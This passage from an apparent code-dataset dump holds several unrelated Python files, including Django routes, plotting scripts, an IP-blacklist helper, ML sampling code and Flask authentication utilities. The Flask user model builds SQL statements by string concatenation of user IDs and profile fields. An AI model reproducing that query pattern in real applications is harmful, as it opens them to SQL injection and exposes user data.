context)\n\n\n# Create your views here.\n","sub_path":"src/theApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232766188","text":"\nfrom django.conf.urls import url\n#from user import views\nfrom user.views import RegisterView,ActiveView,LoginView\napp_name = 'user'\nurlpatterns = [\n\n #url(r'^register$',views.register,name='register'),#注册页面\n #url(r'^register_handle$',views.register_handle,name='register_handle')#用户点击注册\n url(r'^register$',RegisterView.as_view(),name='register'),\n url(r'^active/(?P.*)$',ActiveView.as_view(),name='active'),\n url(r'^login$',LoginView.as_view(),name='login')\n]\n","sub_path":"apps/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262052797","text":"# -*- coding: utf-8 -*-\r\n__author__ = 'tinopf@gmail.com'\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pymongo as mg\r\n\r\n# Constants\r\nSERVER = \"mongodb://localhost:27017/\"\r\n\r\n\r\ndef plot_results_dataset():\r\n \"\"\"\r\n Read data MongoDB Collection with a set of points and return a list of objects Point\r\n :param dir_dataset:\r\n \"\"\"\r\n mongoClient = mg.MongoClient(SERVER)\r\n\r\n db = mongoClient[\"CLUSTERING\"]\r\n coleccion = db[\"FOURSQUARE_TotalVisits_AGGREGATE_SUBWAY\"]\r\n\r\n pipeline = [\r\n { \"$limit\": 100 },\r\n { \"$group\": { \"_id\": \"$VenueID\", \"total\": { \"$sum\": \"$VisitasTotales\" } } },\r\n { \"$sort\": { \"total\": -1 } }\r\n ]\r\n cursor = coleccion.aggregate(pipeline)\r\n datos = list(cursor)\r\n\r\n venues = list()\r\n visitas = list()\r\n for documento in datos:\r\n venues.append(documento['_id'])\r\n visitas.append(float(documento['total']))\r\n\r\n plt.plot(venues, visitas, 'ro-', markersize=8, lw=2)\r\n plt.grid(True)\r\n plt.show()\r\n\r\n\r\ndef loadData():\r\n plot_results_dataset()\r\n\r\n\r\nif __name__ == '__main__':\r\n loadData()","sub_path":"clustering/python/PlotAggregatedData.py","file_name":"PlotAggregatedData.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"476508662","text":"import matplotlib\n\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport typing\n\n\ndef create_failure_pie_chart(questions: typing.List[str], failures: typing.List[int], title: str, filename: str):\n\tplt.figure(figsize=(11, 7))\n\twedges, texts, val = plt.pie(failures, wedgeprops=dict(width=0.5), autopct='%1.0f%%', pctdistance=1.1, colors=['#209cee', '#00d1b2','#23d160', '#ff3860','#9467bd','#8c564b','#e377c2'],\n\t# wedges, texts, val = plt.pie(failures, wedgeprops=dict(width=0.5), autopct='%1.0f%%', pctdistance=1.1, \n\t\t\t\t\t\t\t\t startangle=-40)\n\n\tbbox_props = {\n\t\t'boxstyle': 'square,pad=0.3',\n\t\t'fc': 'w',\n\t\t'ec': 'k',\n\t\t'lw': 0.72\n\t}\n\n\tkw = {\n\t\t'arrowprops': {\n\t\t\t'arrowstyle': '-'\n\t\t},\n\t\t'bbox': bbox_props,\n\t\t'zorder': 0,\n\t\t'va': 'center'\n\t}\n\n\tplt.title(title, fontsize=15, weight='bold')\n\n\tplt.legend(\n\t\twedges,\n\t\tquestions,\n\t\tloc='upper center',\n\t\tbbox_to_anchor=(0.5, -0.00),\n\t\tfancybox=True\n\t)\n\n\tplt.savefig(filename, bbox_inches='tight')\n","sub_path":"src/mqmcharts/piefailures.py","file_name":"piefailures.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"233500531","text":"import jax\nimport jax.numpy as jnp\n\n@partial(jax.jit, static_argnums = (1,2,3,))\ndef greedy(key, pure_logits_fn, config, params, initial_token_ids, *args, **kwargs):\n \n token_ids = initial_token_ids\n for i in range(config['max_length']):\n \n key, subkey = jax.random.split(key)\n logits = pure_logits_fn.apply(params, subkey, token_ids, *args, **kwargs)\n \n predictions = jnp.argmax(logits[:,i,:], axis=-1)\n \n token_ids = jax.ops.index_update(token_ids, jax.ops.index[:,i,:],\n predictions)\n return token_ids\n\n\n ","sub_path":"src/model/decoding_algos.py","file_name":"decoding_algos.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"619064050","text":"import json\r\nimport itertools\r\nimport re\r\nimport os\r\nimport netaddr\r\nimport logging\r\nfrom multiprocessing import Semaphore, cpu_count\r\n\r\n\r\nclass General:\r\n def __init__(self):\r\n # Regular expressions\r\n self.added_ip_re = re.compile(r\"(?<=\\+)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(?=(?!/)\\D|$)\")\r\n self.added_net_re = re.compile(r\"(?<=\\+)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(/([0-9]|[1-2][0-9]|3[0-2])){1}(?=\\D|$)\")\r\n self.removed_ip_re = re.compile(r\"(?<=-)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(?=(?!/)\\D|$)\")\r\n self.removed_net_re = re.compile(r\"(?<=-)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(/([0-9]|[1-2][0-9]|3[0-2])){1}(?=\\D|$)\")\r\n self.ip_re = re.compile(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\r\n self.net_re = re.compile(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(/([0-9]|[1-2][0-9]|3[0-2]))$\")\r\n self.not_periodic_feed_re = re.compile(r\"^(?!.*_\\d{1,3}d(\\.ipset|\\.netset)).*(\\.ipset|\\.netset)$\")\r\n self.uniq_ips_re = re.compile(r\"(?<=\\ )(\\d*)(?= unique IPs)\")\r\n\r\n # Application configuration\r\n self.config = self.load_config(\"%s/%s\" % (os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"conf/app.conf\"))\r\n self.database_user = self.config.get(\"pg_database_user\")\r\n self.database_password = self.config.get(\"pg_database_password\")\r\n self.database_name = self.config.get(\"pg_database_name\")\r\n self.server_address = self.config.get(\"pg_server_address\")\r\n self.firehol_ipsets_git = self.config.get(\"firehol_ipsets_git\")\r\n self.sync_period_h = self.config.get(\"sync_period_h\")\r\n self.unique_ips_limit = self.config.get(\"unique_ips_limit\")\r\n\r\n # FireHOL repo path\r\n self.repo_path = \"%s/%s\" % (os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"git/firehol\")\r\n\r\n # Logger configuration\r\n self.log_path = \"%s/%s\" % (os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"log/run.log\")\r\n self.logger = logging.getLogger(__name__)\r\n self.formatter = logging.basicConfig(filename=self.log_path, level=logging.INFO,\r\n format=\"%(asctime)s [%(levelname)s] [%(filename)s] %(funcName)s: %(message)s\")\r\n\r\n def load_config(self, config):\r\n with open(config) as file_obj:\r\n return json.load(file_obj)\r\n\r\n def read_file(self, filename):\r\n with open(filename) as f:\r\n for line in f:\r\n yield line.strip(\"\\n\")\r\n\r\n def group_by(self, n, iterable):\r\n it = iter(iterable)\r\n\r\n while True:\r\n chunk = tuple(itertools.islice(it, n))\r\n if not chunk:\r\n return\r\n yield chunk\r\n\r\n def iterate_net(self, net_raw):\r\n for ip in netaddr.IPNetwork(net_raw).iter_hosts():\r\n yield str(ip)\r\n\r\n def validate_request(self, request):\r\n if self.net_re.match(request) or self.ip_re.match(request):\r\n\r\n return True\r\n\r\n def get_cpu_count(self):\r\n return Semaphore(cpu_count()).get_value()\r\n\r\n def get_files(self, directory):\r\n files = list()\r\n\r\n for file in os.listdir(directory):\r\n files.append(os.path.join(directory, file))\r\n\r\n return files\r\n\r\n def extend_result_data(self, results, currently_presented_count=0):\r\n bunched_dict = dict()\r\n extended_results = list()\r\n\r\n for dictionary in results:\r\n current_status = \"absent\"\r\n\r\n if not dictionary.get(\"last_removed\"):\r\n current_status = \"present\"\r\n\r\n elif dictionary.get(\"last_added\") > dictionary.get(\"last_removed\"):\r\n current_status = \"present\"\r\n\r\n dictionary.update({\r\n \"current_status\": current_status\r\n })\r\n\r\n bunching_element = dictionary.pop(\"ip\", None)\r\n bunched_dict.setdefault(bunching_element, []).append(dictionary)\r\n\r\n for bunching_element, value in bunched_dict.items():\r\n currently_blacklisted = False\r\n\r\n for dictionary in value:\r\n if dictionary.get(\"current_status\", None) == \"present\":\r\n currently_blacklisted = True\r\n currently_presented_count += 1\r\n\r\n break\r\n\r\n extended_results.append({\r\n \"ip\": bunching_element,\r\n \"categories\": list(set([dictionary.get(\"category\") for dictionary in bunched_dict[bunching_element]])),\r\n \"first_seen\": sorted(list(set([dictionary.get(\"first_seen\") for dictionary in bunched_dict[bunching_element]])))[0],\r\n \"last_added\": sorted(list(set([dictionary.get(\"last_added\") for dictionary in bunched_dict[bunching_element]])), reverse=True)[0],\r\n \"hits_count\": len(value),\r\n \"currently_blacklisted\": currently_blacklisted,\r\n \"hits\": bunched_dict.get(bunching_element, None)\r\n })\r\n\r\n return extended_results, currently_presented_count\r\n","sub_path":"app/modules/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45564368","text":"from __future__ import division\nfrom scipy.stats import triang\nfrom scipy.stats import norm\nfrom scipy.stats import uniform\nfrom sklearn import preprocessing\n\nfrom cea.utilities import latin_hypercube\nimport pandas as pd\nimport numpy as np\nimport numpy.ma as ma\n\n__author__ = \"Jimeno A. Fonseca\"\n__copyright__ = \"Copyright 2017, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Jimeno A. Fonseca\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\ndef latin_sampler(locator, num_samples, variables):\n \"\"\"\n This script creates a matrix of m x n samples using the latin hypercube sampler.\n for this, it uses the database of probability distribtutions stored in locator.get_uncertainty_db()\n it returns clean and normalized samples.\n\n :param locator: pointer to locator of files of CEA\n :param num_samples: number of samples to do\n :param variables: list of variables to sample\n :return:\n 1. design: a matrix m x n with the samples where each feature is normalized from [0,1]\n 2. design_norm: a matrix m x n with the samples where each feature is normalized from [0,1]\n 3. pdf_list: a dataframe with properties of the probability density functions used in the exercise.\n\n \"\"\"\n\n # get probability density function PDF of variables of interest\n variable_groups = ('ENVELOPE', 'INDOOR_COMFORT', 'INTERNAL_LOADS','SYSTEMS')\n database = pd.concat([pd.read_excel(locator.get_uncertainty_db(), group, axis=1)\n for group in variable_groups])\n pdf_list = database[database['name'].isin(variables)].set_index('name')\n\n # get number of variables\n num_vars = pdf_list.shape[0] # alternatively use len(variables)\n\n # get design of experiments\n samples = latin_hypercube.lhs(num_vars, samples=num_samples, criterion='maximin')\n for i, variable in enumerate(variables):\n\n distribution = pdf_list.loc[variable, 'distribution']\n #sampling into lhs\n min = pdf_list.loc[variable, 'min']\n max = pdf_list.loc[variable, 'max']\n mu = pdf_list.loc[variable, 'mu']\n stdv = pdf_list.loc[variable, 'stdv']\n if distribution == 'triangular':\n loc = min\n scale = max - min\n c = (mu - min) / (max - min)\n samples[:, i] = triang(loc=loc, c=c, scale=scale).ppf(samples[:, i])\n elif distribution == 'normal':\n samples[:, i] = norm(loc=mu, scale=stdv).ppf(samples[:, i])\n elif distribution == 'boolean': # converts a uniform (0-1) into True/False\n samples[:, i] = ma.make_mask(np.rint(uniform(loc=min, scale=max).ppf(samples[:, i])))\n else: # assume it is uniform\n samples[:, i] = uniform(loc=min, scale=max).ppf(samples[:, i])\n\n min_max_scaler = preprocessing.MinMaxScaler(copy=True, feature_range=(0, 1))\n samples_norm = min_max_scaler.fit_transform(samples)\n\n return samples, samples_norm, pdf_list\n","sub_path":"legacy/calibration/latin_sampler.py","file_name":"latin_sampler.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"280429433","text":"import librosa\nimport os\naudio_path = '/home/helin.wang/audioset/audioset_raw/download/train'\nlistx=[]\nfor root, dirs, files in os.walk(audio_path):\n for x in files:\n audio = audio_path+ '/'+x\n time = librosa.get_duration(filename=audio)\n if(time>0):\n print(x)\n listx.append(x)\nprint(len(listx))","sub_path":"download/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"177065393","text":"import tensorflow as tf\n\nfrom Model.Graph.Graph import deepNN\nfrom Model.ModelDataGenerator import ModelDataGenerator\n\n\nclass TestModel:\n def __init__(self):\n self.model_data_generator = ModelDataGenerator()\n\n def main(self):\n\n tf.reset_default_graph()\n\n # Build the graph for the deep net\n with tf.name_scope('inputs'):\n x = tf.placeholder(tf.float32, [None, self.model_data_generator.input_length])\n y_ = tf.placeholder(tf.float32, [None, self.model_data_generator.class_count])\n\n\n with tf.name_scope('model'):\n y_conv = deepNN(x, False, self.model_data_generator.class_count)\n\n x_shape = [-1, self.model_data_generator.input_length]\n\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1, save_relative_paths=True)\n\n sess = tf.Session()\n # First let's load meta graph and restore weights\n saver = tf.train.import_meta_graph('../logs/exp_bs_100/model.ckpt-1999.meta')\n saver.restore(sess, tf.train.latest_checkpoint('../logs/exp_bs_100/'))\n\n (testImages, testLabels) = self.model_data_generator.getValidationBatch()\n\n prediction = tf.argmax(y_conv, 1)\n labels = sess.run(prediction,\n feed_dict={x: testImages.reshape(x_shape), y_: testLabels})\n\n print(labels)\n\n\n\nif __name__ == \"__main__\":\n s = TestModel()\n s.main()\n\n","sub_path":"Code/Model/ModelTesting/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"310089228","text":"#! /usr/bin/env python3\n\nimport random\nimport time\nfrom E160_environment import *\nfrom E160_graphics import *\n\ndef main(): \n \n # instantiate robot navigation classes\n environment = E160_environment()\n graphics = E160_graphics(environment)\n \n # set time step size in seconds\n deltaT = 0.1\n simRate = 100\n # loop over time\n while True:\n # update graphics, but stop the thread if user stopped the gui\n if not graphics.update():\n break\n \n # update robots\n environment.update_robots(deltaT)\n \n # log all the robot data\n environment.log_data()\n \n # maintain timing\n time.sleep(deltaT/simRate)\n \nmain()\n","sub_path":"Code/E160_gui.py","file_name":"E160_gui.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59540584","text":"import sys\n\n\ndef sol():\n input = sys.stdin.readline\n _, M = map(int, input().split())\n trees = list(map(int, input().split()))\n trees_count = dict()\n for tree in trees:\n if tree not in trees_count:\n trees_count[tree] = 0\n trees_count[tree] += 1\n trees_set = set(trees)\n low = 0\n high = max(trees)\n result = -1\n while low <= high:\n mid = (low + high) // 2\n total_length = sum(\n [(tree - mid) * trees_count[tree] for tree in trees_set if tree >= mid]\n )\n if total_length < M:\n high = mid - 1\n else:\n low = mid + 1\n result = mid\n print(result)\n\n\nif __name__ == \"__main__\":\n sol()\n","sub_path":"2805/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463146042","text":"# select all the records from the Customer table\nfrom accounts.models import *\n\ncustomer = customer.objects.all()\n# print(customer)\n# selct first customer from the customer table\nFirstCustomer = customer.objects.first()\n# print(FirstCustomer)\n# select last customer from the customer table\nLastCustomer = customer.objects.last()\n# print(LastCustomer)\n\n# Return single customer by name\ncustomerByName = customer.objects.get(name='Rakesh')\n# print(customerByName)\n# Return single customer by id\ncustomerById = customer.objects.get(id='10')\n# print(customerById)\n\n# Return all the orders related to customer(variable FirstCustomer is given)\nFirstCustomer.order_set.all()\n\n# Return orders customer\n\n","sub_path":"crm/accounts/querydemo.py","file_name":"querydemo.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634386098","text":"import bcrypt\nimport collections\nfrom functools import wraps\nimport json\nfrom random import SystemRandom\nimport re\nimport string\n\nimport flask\nfrom userdatamodel.driver import SQLAlchemyDriver\nfrom werkzeug.datastructures import ImmutableMultiDict\n\nfrom fence.models import Client, User\nfrom fence.jwt.token import CLIENT_ALLOWED_SCOPES\n\nrng = SystemRandom()\nalphanumeric = string.ascii_uppercase + string.ascii_lowercase + string.digits\n\n\ndef random_str(length):\n return ''.join(rng.choice(alphanumeric) for _ in xrange(length))\n\n\ndef json_res(data):\n return flask.Response(json.dumps(data), mimetype='application/json')\n\n\ndef create_client(\n username, urls, DB, name='', description='', auto_approve=False,\n is_admin=False):\n driver = SQLAlchemyDriver(DB)\n client_id = random_str(40)\n client_secret = random_str(55)\n hashed_secret = bcrypt.hashpw(client_secret, bcrypt.gensalt())\n with driver.session as s:\n user = s.query(User).filter(User.username == username).first()\n if not user:\n user = User(username=username, is_admin=is_admin)\n s.add(user)\n if s.query(Client).filter(Client.name == name).first():\n raise Exception('client {} already exists'.format(name))\n return\n client = Client(\n client_id=client_id, client_secret=hashed_secret,\n user=user, _redirect_uris=urls,\n _allowed_scopes=' '.join(CLIENT_ALLOWED_SCOPES),\n description=description, name=name, auto_approve=auto_approve)\n s.add(client)\n s.commit()\n return client_id, client_secret\n\n\ndef drop_client(client_name, db):\n driver = SQLAlchemyDriver(db)\n with driver.session as s:\n clients = s.query(Client).filter(Client.name == client_name)\n clients.delete()\n s.commit()\n\n\ndef hash_secret(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n has_secret = 'client_secret' in flask.request.form\n has_client_id = 'client_id' in flask.request.form\n if flask.request.form and has_secret and has_client_id:\n form = flask.request.form.to_dict()\n with flask.current_app.db.session as session:\n client = (\n session\n .query(Client)\n .filter(Client.client_id == form['client_id'])\n .first()\n )\n if client:\n form['client_secret'] = bcrypt.hashpw(\n form['client_secret'].encode('utf-8'),\n client.client_secret.encode('utf-8')\n )\n flask.request.form = ImmutableMultiDict(form)\n\n return f(*args, **kwargs)\n\n return wrapper\n\n\ndef wrap_list_required(f):\n @wraps(f)\n def wrapper(d, *args, **kwargs):\n data_is_a_list = False\n if isinstance(d, list):\n d = {'data': d}\n data_is_a_list = True\n if not data_is_a_list:\n return f(d, *args, **kwargs)\n else:\n result = f(d, *args, **kwargs)\n return result['data']\n return wrapper\n\n\n@wrap_list_required\ndef convert_key(d, converter):\n if isinstance(d, str) or not isinstance(d, collections.Iterable):\n return d\n\n new = {}\n for k, v in d.iteritems():\n new_v = v\n if isinstance(v, dict):\n new_v = convert_key(v, converter)\n elif isinstance(v, list):\n new_v = list()\n for x in v:\n new_v.append(convert_key(x, converter))\n new[converter(k)] = new_v\n return new\n\n\n@wrap_list_required\ndef convert_value(d, converter):\n if isinstance(d, str) or not isinstance(d, collections.Iterable):\n return converter(d)\n\n new = {}\n for k, v in d.iteritems():\n new_v = v\n if isinstance(v, dict):\n new_v = convert_value(v, converter)\n elif isinstance(v, list):\n new_v = list()\n for x in v:\n new_v.append(convert_value(x, converter))\n new[k] = converter(new_v)\n return new\n\n\ndef to_underscore(s):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', s)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef strip(s):\n if isinstance(s, str):\n return s.strip()\n return s\n","sub_path":"fence/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292053677","text":"import sys\n\nbirth = {}\n\ndef test():\n for line in sys.stdin:\n line = line.strip()\n #print(line)\n tokens = line.split()\n print(tokens)\n m = int(tokens[1])\n if birth.get(m):\n birth[m] += 1\n else:\n birth[m] = 1\n #print(birth)\n for i in range(1,13):\n print(i,birth.get(i))\n\ntest() ","sub_path":"dict_3.py","file_name":"dict_3.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365495217","text":"#先选取一个数,将所有比这个数字小的移动到左侧,比这个数大的移动到右侧,然后递归直到全都排序好\n#注意以下几点:1.终止条件,2.如何移动,3,如何拿到新的标尺\ndef quickSort(start,end,nums):\n #递归终止条件\n if start>=end:\n return \n #返回新的标尺的下标\n pi = partition(start,end,nums)\n #以新的标尺的下标分割左右再次调用\n quickSort(start,pi-1,nums)\n quickSort(pi+1,end,nums)\n \n\ndef partition(start,end,nums):\n #每次以启示为标尺\n pivot = nums[start]\n #mark就是要移动的下标\n mark = start\n \n #遍历当前范围\n for i in range(start+1,end+1):\n #如果小的话\n if nums[i]-fix.py","file_name":"fba4f831bc75369c975a95c9b7774e9e89f8a2f9-<__init__>-fix.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"523791725","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.core.urlresolvers import reverse\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\n\n\nclass RegisterForm(UserCreationForm):\n email = forms.EmailField(\n label='E-mail',\n required=True\n )\n\n def __init__(self, *args, **kwargs):\n self.helper = FormHelper()\n self.helper.form_id = 'register-form'\n self.helper.form_method = 'post'\n self.helper.form_action = reverse('register')\n\n self.helper.add_input(Submit('registrar', 'Registrar'))\n super(RegisterForm, self).__init__(*args, **kwargs)\n\n def save(self, commit=True):\n user = super(UserCreationForm, self).save(commit=False)\n user.email = self.cleaned_data.get('email')\n if commit:\n user.save()\n return user\n","sub_path":"src/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155511869","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('module/', views.module, name=\"module\"),\n path('singleton/', views.singleton, name=\"singleton\"),\n path('factory/', views.factory, name=\"factory\"),\n path('observer/', views.observer, name=\"observer\"),\n path('mediator', views.mediator, name=\"mediator\"),\n path('state/', views.state, name=\"state\"),\n]\n","sub_path":"Traversy/javascript/patterns/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"217720609","text":"\"\"\"\n\nGiven an array of integers, find two numbers such that they add up to a specific target number.\n\n\"\"\"\n\nclass Solution(object):\n def twoSum(self, nums, target):\n for count,elem in enumerate(nums):\n if target-elem in nums[count+1:]:\n index1=count+1\n index2=nums[count+1:].index(target-elem)+index1+1\n break\n return [index1,index2]\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n","sub_path":"001_Two_Sum.py","file_name":"001_Two_Sum.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"347421402","text":"\n\ndef binary_search(arr, item):\n\tleft = 0\n\tright = len(arr) - 1\n\n\twhile(left <= right):\n\t\tmiddle = (right + left) // 2\n\n\t\tif arr[middle] == item:\n\t\t\treturn middle\n\t\telif arr[middle] < item:\n\t\t\tleft = middle + 1\n\t\telif arr[middle] > item:\n\t\t\tright = middle - 1\n\n\treturn -1\n\n\ndef run():\n\tarr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\tfor i in range(9):\n\t\tprint(binary_search(arr, i + 1))\n\n\nif __name__ == \"__main__\":\n\trun()\n","sub_path":"semana_03/gfg/02_BinarySearch.py","file_name":"02_BinarySearch.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412193749","text":"from flask_login import UserMixin\r\nfrom sqlalchemy import create_engine \r\nimport os\r\n\r\n\r\n################################################################\r\n\r\ndef get_db():\r\n\tdb=None\r\n\ttry:\r\n\t\tdatabase_url = os.environ['DATABASE_URL']\r\n\t\tdb = create_engine(database_url)\r\n\t\treturn db\r\n\texcept Exception as e:\r\n\t\tprint(\"Error. Database not accessible: \"+str(e))\r\n\t\treturn (\"Error. Database not accessible: \")\r\n\r\nDATABASE_CURSOR = get_db()\r\nif DATABASE_CURSOR == None:\r\n\tprint(\"DataBase == NONE. Database not accessible\")\r\nelse:\r\n\tprint(\"DataBase conected for user setup*******\")\r\n\r\n################################################################\r\n\r\nclass User(UserMixin):\r\n\tdef __init__(self, id_, name, email, profile_pic,faculdade='', curso='', numberfiles='', files='', numbercoments='', coments='', numberiteration='', iteration='', numberbookmarks='', bookmarks='', numberfriends='', friends='', misc='', extra=''):\r\n\t\tself.id = id_\r\n\t\tself.name = name\r\n\t\tself.email = email\r\n\t\tself.profile_pic = profile_pic\r\n\t\tself.faculdade = faculdade\r\n\t\tself.curso = curso\r\n\t\tself.numberfiles = numberfiles\r\n\t\tself.files = files\r\n\t\tself.numbercoments = numbercoments\r\n\t\tself.coments = coments\r\n\t\tself.numberiteration = numberiteration\r\n\t\tself.iteration = iteration\r\n\t\tself.numberbookmarks = numberbookmarks\r\n\t\tself.bookmarks = bookmarks\r\n\t\tself.numberfriends = numberfriends\r\n\t\tself.friends = friends\r\n\t\tself.misc = misc\r\n\t\tself.extra = extra\r\n\r\n\t@staticmethod\r\n\tdef get(user_id):\r\n\t\tDATABASE_CURSOR = get_db()\r\n\t\tcur=DATABASE_CURSOR\r\n\t\tTABLE=os.environ['DATABASE_TABLE_USERS']\r\n\t\tcontent = \"SELECT * FROM \"+TABLE+\" WHERE id = '\"+str(user_id)+\"'\"\r\n\t\tuser = cur.execute(content).fetchone()\r\n\r\n\t\tif not user:\r\n\t\t\treturn None\r\n\r\n\t\tuser = User(\r\n\t\t\tid_ = user[0], \r\n\t\t\tname = user[1],\r\n\t\t\temail = user[2],\r\n\t\t\tprofile_pic = user[3],\r\n\t\t\tfaculdade = user[4],\r\n\t\t\tcurso = user[5],\r\n\t\t\tnumberfiles = user[6],\r\n\t\t\tfiles = user[7],\r\n\t\t\tnumbercoments = user[8],\r\n\t\t\tcoments = user[9],\r\n\t\t\tnumberiteration = user[10],\r\n\t\t\titeration = user[11],\r\n\t\t\tnumberbookmarks = user[12],\r\n\t\t\tbookmarks = user[13],\r\n\t\t\tnumberfriends = user[14],\r\n\t\t\tfriends = user[15],\r\n\t\t\tmisc = user[16],\r\n\t\t\textra = user[17],\r\n\t\t)\r\n\t\treturn user\r\n\r\n\t@staticmethod\r\n\tdef create(id_, name, email, profile_pic):\r\n\t\tDATABASE_CURSOR = get_db()\r\n\t\tcur=DATABASE_CURSOR\r\n\t\tTABLE=os.environ['DATABASE_TABLE_USERS']\r\n\t\tcontent = \"INSERT INTO \"+TABLE+\" VALUES('\"+str(id_)+\"','\"+str(name)+\"','\"+str(email)+\"','\"+str(profile_pic)+\"');\"\r\n\t\tcur.execute(content)\r\n","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"304104143","text":"import rsa\nimport time\n\n\nimport Crypto\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\nimport base64\n\ndef enc_PyRSA():\n \n start = time.time()\n\n (pub,priv) = rsa.newkeys(2048,poolsize=2)\n\n end = time.time()\n print(\"runtime:\"+str(end - start))\n return(end-start)\n\ndef enc_Pycryptodome():\n start = time.time()\n rand = Random.new().read\n key = RSA.generate(2048,rand)\n mid = time.time()\n print(\"key gen time:\"+str(mid - start)+\" seconds\")\n return(mid-start)\n\n\ndef run():\n total = 0\n print(\"---- pyRSA ----\")\n for i in range(0,10):\n f = enc_PyRSA()\n total = total + f\n\n print(\"pyRSA avg:\" + str(total/10))\n print(\"----Pycryptodome----\")\n total = 0\n for i in range(0,10):\n f = enc_Pycryptodome()\n total = total + f\n\n print(\"pyCryptodome avg:\" + str(total/10))\n\n \n","sub_path":"Proof of concept/RSA_Test2.py","file_name":"RSA_Test2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259572271","text":"from datetime import date as pydate\nfrom random import choice\nimport os\nimport sys\nfrom sqlalchemy import (Boolean, Column, Date, DateTime, ForeignKey, Index,\n Integer, LargeBinary, MetaData, String, Table,\n 